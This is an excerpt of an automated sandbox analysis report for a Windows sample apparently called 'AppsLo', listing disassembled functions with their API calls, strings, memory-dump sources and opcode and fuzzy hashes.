Instruction Fuzzy Hash: 1AD092708193109BC3507F74894921DBEB0AF81221F40CB1DE4E456294D63884489B92

Function 00F935C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F935F8

Part of subcall function 00F9304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00F93609,00000000,?,00000000), ref: 00F93069
Part of subcall function 00F9304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F7C025,?,00F55405,?,00000000,?), ref: 00F93075

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: f981ba6246779924d18c96181cf9e852a5155dc357978a49dd49c5ccb45eb172
Instruction ID: 53d40ac4b50c8f2ec9c2fe919b8110ee4c3c910aa9070bdacaa1536e6f851163
Opcode Fuzzy Hash: f981ba6246779924d18c96181cf9e852a5155dc357978a49dd49c5ccb45eb172
Instruction Fuzzy Hash: 5D315E76E00228AFDB11DFA8C884ADEB7F8EF08710F01456AED05FB311D6359D008BA0

Function 00F95870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,00FBAAA0,00000000,80070490,?,?,00F68B19,WiX\Burn,PackageCache,00000000,00FBAAA0,00000000,00000000,80070490), ref: 00F958CA

Part of subcall function 00F910B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00F9112B
Part of subcall function 00F910B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00F91163

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: bb1d9b8d907fc5bbf5bc5e19e7ca67e513968014b021aed8778d13df1ed7389c
Instruction ID: 0bdc5968e0cf0246599d4f4136ba228c44b8aa01d3642140ca93ca15aa209296
Opcode Fuzzy Hash: bb1d9b8d907fc5bbf5bc5e19e7ca67e513968014b021aed8778d13df1ed7389c
Instruction Fuzzy Hash: 1E11C236C0062AEFAF23AE94DD459AEBB68EF04B30B114139ED0167211C7354E60F7D1

Function 00F534B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00F68BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00F534D5

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0c4e37d53354a4d7a3351e277f382ef435ef813975997a2f6e0580f081d1612a
Instruction ID: 4f868db31e14f7fd6746e0d2c5e7eb5daf9b07cf4613405fd979e7f1d514790f
Opcode Fuzzy Hash: 0c4e37d53354a4d7a3351e277f382ef435ef813975997a2f6e0580f081d1612a
Instruction Fuzzy Hash: 76E02B722001283BE7026F655C05DEB3B8CEF053917008011FF00D3000D376E504B3B1

Function 1006DC87 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,100680F9,00000001,?,?,?,10068272,?,?,?,10082890,0000000C,1006832D), ref: 1006DC9C

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: fc978fbda1a174bbf3262c34ba6a706c683f864871c6bbd01d870b004c6ef7b0
Instruction ID: d87adf701f38c020ab9a076e757b9bfb89af85dbfe74647cd7b5c1d80ebb0683
Opcode Fuzzy Hash: fc978fbda1a174bbf3262c34ba6a706c683f864871c6bbd01d870b004c6ef7b0
Instruction Fuzzy Hash: 63D01732A9035E5AE701AB716D48B263AE8F784795F044436E90CC6150F674C581C680

Function 00F99684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F9966B

Part of subcall function 00F9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F99A09
Part of subcall function 00F9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F99A1A

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a6e6203eebfc3708117dee9ef98ed8154bef772a488dfc362b376dc20f2a5b1f
Instruction ID: 7a3b90c927451b727ab45767f507ef5310d35e58928e7014e86728c102829e65
Opcode Fuzzy Hash: a6e6203eebfc3708117dee9ef98ed8154bef772a488dfc362b376dc20f2a5b1f
Instruction Fuzzy Hash: 4CB012A236C2016C3F48514F2E43D77010CC5C0B11332411EB001D1041E8C54C027A33

Function 00F99674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F9966B

Part of subcall function 00F9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F99A09
Part of subcall function 00F9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F99A1A

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ab1beb448cf360624dade90fdb007bb49032033d2c1f011c752c7b93829274ec
Instruction ID: 0fe921f23adb93ea69af39f682d733180e0f99ddf13a994d30c1e57421a80c9d
Opcode Fuzzy Hash: ab1beb448cf360624dade90fdb007bb49032033d2c1f011c752c7b93829274ec
Instruction Fuzzy Hash: 73B0129236C1026C3F48510F1C03D77010CC1C0B11332C11EB411C1041E8C04C057B33

Function 00F99653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F9966B

Part of subcall function 00F9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F99A09
Part of subcall function 00F9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F99A1A

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c1435b767d8357ca51f80a1bbfe9f98d94ab103534453a86caf1033de7b0a05
Instruction ID: 7a2e5bd562a0668656069eb2f6fab8efef827f767fb8a30fe75bdca1b11c51c3
Opcode Fuzzy Hash: 2c1435b767d8357ca51f80a1bbfe9f98d94ab103534453a86caf1033de7b0a05
Instruction Fuzzy Hash: FCB0129236C1057C3F08110F6C82C77010CC5C0B11332811EB001E0041A8C04C017B33

Function 10010206 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 1001020E

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5905b66bebc1e570926d21d9e4b3286b345701c196fb83ae20653ad4a8786bf4
Instruction ID: 62a5c7b95c37bd68cc133e041aea9c301421c012437fbaca2513dbbfa8fc5d00
Opcode Fuzzy Hash: 5905b66bebc1e570926d21d9e4b3286b345701c196fb83ae20653ad4a8786bf4
Instruction Fuzzy Hash: 32B0112080E3E0AFE303032008A82883FB0882300030A80C3C282CA0A3E00C8A8E8B2A

Function 00F514B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00F521A8,?,00000000,?,00000000,?,00F5390C,00000000,?,00000104), ref: 00F514E8

Part of subcall function 00F53BD3: GetProcessHeap.KERNEL32(00000000,?,?,00F521CC,?,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53BDB
Part of subcall function 00F53BD3: HeapSize.KERNEL32(00000000,?,00F521CC,?,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53BE2

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 5f140d0a2fbdb388fd7f59eaba3fcef4137840064a5eed9560fdcd2c1f196298
Instruction ID: 4cfeef8aeb8cc8cda74af7edaf56231677937be4eb32b28f1bfbddc90c1dba1f
Opcode Fuzzy Hash: 5f140d0a2fbdb388fd7f59eaba3fcef4137840064a5eed9560fdcd2c1f196298
Instruction Fuzzy Hash: 5F014937200218ABCF119E54ECC0F9A7765BF85762F144215FF165B251E735BC48A6D0

Non-executed Functions

Function 100250E1 Relevance: 15.1, APIs: 10, Instructions: 132clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 100250F0
EmptyClipboard.USER32 ref: 10025100
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002516F
MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 10025193
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?), ref: 100251C3
SetClipboardData.USER32(00000001,00000000), ref: 100251D4
SetClipboardData.USER32(00000001,00000000), ref: 10025218
SetClipboardData.USER32(?,00000000), ref: 1002522F
SetClipboardData.USER32(?,00000000), ref: 10025246
CloseClipboard.USER32 ref: 1002524C

Part of subcall function 10024A4A: GlobalAlloc.KERNEL32(00000042,?,?,1002517F,00000000), ref: 10024A53
Part of subcall function 10024A4A: GlobalLock.KERNEL32(00000000), ref: 10024A60

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: Clipboard$Data$ByteCharMultiWide$Global$AllocCloseEmptyLockOpen
String ID:
API String ID: 3089114207-0
Opcode ID: 34e716af3b10cd03686dde2bc46a3a1e09d7e6c67f293165ed17bac30237bf64
Instruction ID: aaf650dadad8166d24b092df87a78aaaf8251f0a3cfd64a5622f3a05dfaeb053
Opcode Fuzzy Hash: 34e716af3b10cd03686dde2bc46a3a1e09d7e6c67f293165ed17bac30237bf64
Instruction Fuzzy Hash: 5341A075800209EFDF01DFA0DC80CBEBBB9FF04345B51452AF956620A2DB716E51DB61

Function 100050F0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 195COMMON

Download Yara Rule

APIs

?Length@CellBuffer@@QBEHXZ.TROMBONE(?), ref: 1000510C
?IsWordPartSeparator@Document@@QAE_ND@Z.TROMBONE(?,?), ref: 10005119

Part of subcall function 10004EB8: ?WordCharClass@Document@@AAE?AW4cc@CharClassify@@E@Z.TROMBONE(?), ref: 10004EBC

?IsWordPartSeparator@Document@@QAE_ND@Z.TROMBONE(?,?,?), ref: 10005132

Strings

, xrefs: 1000524F

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: Document@@Word$CharPartSeparator@$Buffer@@CellClass@Classify@@Length@W4cc@
String ID:
API String ID: 1397149334-3916222277
Opcode ID: ac35f2cb10bdd0d1253186b3d6cf73d32f33e785448ad2825c8e75a419ad3b59
Instruction ID: 4f099991b9278785bd3dfdf45280ac8e23df6d4049ab928c5bafc1802bd547b0
Opcode Fuzzy Hash: ac35f2cb10bdd0d1253186b3d6cf73d32f33e785448ad2825c8e75a419ad3b59
Instruction Fuzzy Hash: F8512B3990562262FE01DA2498416FFB39EDF471DA714806EFC827718FCE36BD4A57A0

Function 1004B121 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 378COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1004B140
_strcat.LIBCMT ref: 1004B1F2
_strlen.LIBCMT ref: 1004B1FE

Strings

;;+, xrefs: 1004B4CE

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: H_prolog3_strcat_strlen
String ID: ;;+
API String ID: 1382456698-1198638363
Opcode ID: 5253a5b6f0e6ab701a0a3c4bf07054bbe393bc54a0268cf21c3f0b7814542d9e
Instruction ID: 935ed508c876481fc8438470c514f2bc871c0797a26d754f6c45bfff46fbd887
Opcode Fuzzy Hash: 5253a5b6f0e6ab701a0a3c4bf07054bbe393bc54a0268cf21c3f0b7814542d9e
Instruction Fuzzy Hash: 15E1A274D04A89DBCF24CF95D890AEDB3B5EF09341F704039E911BB182DB306A89DB5A

Function 1005B0A6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 100597EB: _fprintf.LIBCMT ref: 10059808

_fprintf.LIBCMT ref: 1005ACB0

Strings

udl: ASTC_F_LOOKBACK_TESTS_CREATE: failed to create p_LBTests, xrefs: 1005B0E3
udl: error: ASTC_F_LOOKBACK_TESTS_CREATE at line %d: p_FamilyInfo is null, xrefs: 1005B82F
udl: bailing out of file '%s' at line %d, xrefs: 1005ACA2

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: _fprintf
String ID: udl: ASTC_F_LOOKBACK_TESTS_CREATE: failed to create p_LBTests$udl: bailing out of file '%s' at line %d$udl: error: ASTC_F_LOOKBACK_TESTS_CREATE at line %d: p_FamilyInfo is null
API String ID: 1654120334-2148968924
Opcode ID: 043da5f097d156476c2db296c17202300a4c68af384862cbef28979ca977ccd5
Instruction ID: 4ee8281849d636309109bc32eb8cec90afb8050db836709135bb4ff6ca6d3b7e
Opcode Fuzzy Hash: 043da5f097d156476c2db296c17202300a4c68af384862cbef28979ca977ccd5
Instruction Fuzzy Hash: 0D110035D04608AADF05DBA48C41BEEBBB6EF89340F10406AF54577083EF74AD888B64

Function 10027030 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10027037
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,?,00000014,00000074), ref: 100270E3
LCMapStringW.KERNEL32(00000800,01000100,?,00000001,?,00000014), ref: 10027102
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,00000014,00000000,00000000), ref: 10027119

Part of subcall function 10063EE3: _malloc.LIBCMT ref: 10063EFD

Part of subcall function 10026B4E: __EH_prolog3.LIBCMT ref: 10026B55

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: ByteCharMultiWide$H_prolog3H_prolog3_String_malloc
String ID:
API String ID: 4088310744-0
Opcode ID: 8aca4173471d03714bed936cf311bfd643e05e0725eab514b9a51ddb28f49d7f
Instruction ID: e0853e1be4e171d4a7b476723fa177a14127656b49075f5f83f7d53a3b0e4fc8
Opcode Fuzzy Hash: 8aca4173471d03714bed936cf311bfd643e05e0725eab514b9a51ddb28f49d7f
Instruction Fuzzy Hash: FB318D75E40158ABEB25CBA5DC81AEDBBBAFF48700F60416AF555A7192CB311A40CB60

Function 100170A6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

?BeginUndoAction@CellBuffer@@QAEXXZ.TROMBONE ref: 100170C1

Part of subcall function 10010716: __EH_prolog3.LIBCMT ref: 1001071D
Part of subcall function 10010716: ?BeginUndoAction@CellBuffer@@QAEXXZ.TROMBONE(00000044,100136FC), ref: 1001074F
Part of subcall function 10010716: ?DeleteChars@Document@@QAE_NHH@Z.TROMBONE(?,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000044,100136FC), ref: 100107F1

?InsertCString@Document@@QAE_NHPBD@Z.TROMBONE(00000000,?), ref: 100170EB

Part of subcall function 1000633F: _strlen.LIBCMT ref: 10006346
Part of subcall function 1000633F: ?InsertString@Document@@QAE_NHPBDH@Z.TROMBONE(?,?,00000000), ref: 10006357

_strlen.LIBCMT ref: 100170F3
?EndUndoAction@CellBuffer@@QAEXXZ.TROMBONE(?), ref: 10017464

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: Action@Buffer@@CellDocument@@Undo$BeginInsertString@_strlen$Chars@DeleteH_prolog3
String ID:
API String ID: 1274463094-0
Opcode ID: e3cab6e9e0c4035b315cfbfcf8de56aab853d7423c8112be01707940279b3a2c
Instruction ID: 1269a76fe9799a8edd0833b1c7fab15d8ac844f4adc58db725f7961e4d6bf458
Opcode Fuzzy Hash: e3cab6e9e0c4035b315cfbfcf8de56aab853d7423c8112be01707940279b3a2c
Instruction Fuzzy Hash: 01018474B003469BDF14DF64C8967AD77A2FF84300F000869B8559F2D3CFB0AA808751

Function 1005B066 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 100597EB: _fprintf.LIBCMT ref: 10059808

_strlen.LIBCMT ref: 1005AD33
_fprintf.LIBCMT ref: 1005ACB0

Part of subcall function 10059782: _fgets.LIBCMT ref: 10059791
Part of subcall function 10059782: _strlen.LIBCMT ref: 100597A0

Strings

udl: error: ASTC_F_KEYWORD_STYLE at line %d: p_FamilyInfo is null, xrefs: 1005B820
udl: bailing out of file '%s' at line %d, xrefs: 1005ACA2

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: _fprintf_strlen$_fgets
String ID: udl: bailing out of file '%s' at line %d$udl: error: ASTC_F_KEYWORD_STYLE at line %d: p_FamilyInfo is null
API String ID: 1379636189-22277436
Opcode ID: 35704937038a6156414f3d57d779be6484df9d39f3ccc8bbb49ca14d7447cd63
Instruction ID: 3c54f605b45b9d33aeda41555335ae8cb01f4013498bc6639cde0a54dfc38d28
Opcode Fuzzy Hash: 35704937038a6156414f3d57d779be6484df9d39f3ccc8bbb49ca14d7447cd63
Instruction Fuzzy Hash: 6B11B135D04608ABDF15DF648C41AAEB7B6FF88341F1080A9F84577193EE71AD898F51

Function 1005B0ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 100597EB: _fprintf.LIBCMT ref: 10059808

_strlen.LIBCMT ref: 1005AD33
_fprintf.LIBCMT ref: 1005ACB0

Part of subcall function 10059782: _fgets.LIBCMT ref: 10059791
Part of subcall function 10059782: _strlen.LIBCMT ref: 100597A0

Strings

udl: bailing out of file '%s' at line %d, xrefs: 1005ACA2
udl: error: ASTC_F_LOOKBACK_TESTS_INIT at line %d: p_LBTests is null, xrefs: 1005B83E

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: _fprintf_strlen$_fgets
String ID: udl: bailing out of file '%s' at line %d$udl: error: ASTC_F_LOOKBACK_TESTS_INIT at line %d: p_LBTests is null
